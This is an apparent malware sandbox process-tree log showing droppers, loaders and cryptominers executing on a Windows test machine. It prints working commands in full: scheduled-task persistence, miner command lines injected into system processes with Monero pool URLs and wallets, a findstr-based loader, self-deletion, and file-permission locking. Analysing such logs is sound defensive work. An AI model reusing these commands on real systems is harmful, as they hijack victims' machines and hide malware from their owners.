C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit12⤵PID:1808
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'13⤵
- Creates scheduled task(s)
PID:1584
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:516
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth12⤵PID:2736
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵PID:3340
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx10⤵PID:3572
-
C:\Windows\SysWOW64\cmd.execmd11⤵PID:3236
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx12⤵PID:4088
-
-
C:\Windows\SysWOW64\PING.EXEping localhost12⤵
- Runs ping.exe
PID:3132
-
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I12⤵PID:2588
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵PID:944
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I14⤵PID:2260
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I15⤵PID:2212
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I16⤵PID:3500
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I17⤵PID:3580
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I18⤵PID:3152
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I19⤵PID:2248
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I20⤵PID:3920
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I21⤵PID:2252
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I22⤵PID:3664
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵PID:1088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit10⤵PID:2252
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "foradvertising.exe" /f11⤵
- Kills process with taskkill
PID:4048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"9⤵PID:1164
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192902b3c24.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri192902b3c24.exeFri192902b3c24.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:792 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 9726⤵
- Program crash
PID:1392
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19d30056588.exe4⤵
- Loads dropped DLL
PID:112 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri19d30056588.exeFri19d30056588.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:764 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:576
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone4⤵
- Loads dropped DLL
PID:548 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri19b9b73e83c948b1d.exeFri19b9b73e83c948b1d.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri19b9b73e83c948b1d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri19b9b73e83c948b1d.exe" & exit6⤵PID:2396
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe4⤵
- Loads dropped DLL
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri1921f7a9d3.exeFri1921f7a9d3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe4⤵
- Loads dropped DLL
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri192f077acf656dd.exeFri192f077acf656dd.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵
- Executes dropped EXE
PID:2224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:1936
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
PID:1900
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵PID:2988
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3040
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2472
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:2460
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵PID:3604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"6⤵
- Executes dropped EXE
PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵
- Executes dropped EXE
PID:2308
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"6⤵
- Executes dropped EXE
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2516
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2552
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵PID:2508
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2508 -s 8967⤵
- Program crash
PID:2572
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"6⤵PID:2544
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2544 -s 13767⤵
- Program crash
PID:2884
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"6⤵PID:2576
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2576 -s 8967⤵
- Program crash
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵PID:2652
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe4⤵
- Loads dropped DLL
PID:1440 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri19870e2febf5544.exeFri19870e2febf5544.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe4⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe4⤵
- Loads dropped DLL
PID:288 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri19927b4fe38a9d1.exeFri19927b4fe38a9d1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1576
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3024 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3036
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:484
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:484 CREDAT:275457 /prefetch:22⤵PID:3216
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1604
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C13331C77478A8CFC0A715B6D9A1F885 C2⤵PID:3332
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 96B65C62D8B20E73424E3CF35E59A5032⤵PID:3408
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3988
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1396 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\4653.exeC:\Users\Admin\AppData\Local\Temp\4653.exe1⤵PID:3980
-
C:\Users\Admin\AppData\Local\Temp\B53D.exeC:\Users\Admin\AppData\Local\Temp\B53D.exe1⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\B53D.exeC:\Users\Admin\AppData\Local\Temp\B53D.exe2⤵PID:3964
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\805168e5-2529-491e-95cb-18eb68116793" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\B53D.exe"C:\Users\Admin\AppData\Local\Temp\B53D.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\B53D.exe"C:\Users\Admin\AppData\Local\Temp\B53D.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:3616
-
C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build2.exe"C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build2.exe"5⤵PID:1716
-
C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build2.exe"C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build2.exe"6⤵PID:564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 8967⤵
- Program crash
PID:1736
-
-
-
-
C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build3.exe"C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build3.exe"5⤵PID:2748
-
C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build3.exe"C:\Users\Admin\AppData\Local\5436861e-37f1-443a-97ea-2fe50b1f14a6\build3.exe"6⤵PID:764
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:3520
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5C07.exeC:\Users\Admin\AppData\Local\Temp\5C07.exe1⤵PID:2476
-
C:\Windows\system32\taskeng.exetaskeng.exe {BAAB68EB-8046-4AE8-96D3-52590DC0BB92} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:4144
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:4208
-
-
C:\Users\Admin\AppData\Roaming\ssdcjedC:\Users\Admin\AppData\Roaming\ssdcjed2⤵PID:4240
-